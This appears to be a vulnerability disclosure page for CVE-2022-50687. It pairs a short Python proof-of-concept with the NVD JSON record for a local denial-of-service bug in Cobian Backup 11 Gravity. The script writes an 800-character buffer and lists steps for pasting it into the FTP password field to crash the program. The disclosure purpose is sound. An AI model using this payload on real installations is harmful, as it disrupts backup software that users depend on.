CVE-2022-50687

#!/usr/bin/env python3 """ CVE-2022-50687 PoC - Cobian Backup 11 Gravity FTP Password Field DoS Description: Generate a specially crafted 800-byte buffer to trigger application crash when pasted into the FTP password field of Cobian Backup 11 Gravity. """ def generate_payload(length=800): """Generate a buffer of specified length to trigger the DoS vulnerability.""" # The payload consists of repeated 'A' characters # This triggers a buffer overflow when processed by the password field payload = 'A' * length return payload def main(): print("=" * 60) print("CVE-2022-50687 PoC - Cobian Backup 11 Gravity DoS") print("=" * 60) # Generate the 800-byte payload as described in the vulnerability payload = generate_payload(800) print(f"\n[+] Generated payload length: {len(payload)} bytes") print(f"[+] Payload preview: {payload[:50]}...") print("\n[!] Instructions:") print("1. Open Cobian Backup 11 Gravity") print("2. Navigate to FTP server configuration") print("3. Paste the generated payload into the FTP password field") print("4. Click OK or Apply to trigger the crash") print("\n[+] Payload saved to 'cve_2022_50687_payload.txt'") # Save payload to file for easy access with open('cve_2022_50687_payload.txt', 'w') as f: f.write(payload) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2022-50687", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:15:59.277", "lastModified": "2026-01-05T14:15:51.993", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cobian Backup 11 Gravity 11.2.0.582 contains a denial of service vulnerability in the FTP password input field that allows attackers to crash the application. Attackers can generate a specially crafted 800-byte buffer and paste it into the password field to trigger an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cobiansoft:backup_11:11.2.0.582:*:*:*:*:*:*:*", "matchCriteriaId": "09D91121-71F6-4D02-9625-B1EC3AB000BE"}]}]}], "references": [{"url": "https://www.cobiansoft.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50790", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/cobian-backup-gravity-local-denial-of-service-via-password-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50790", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}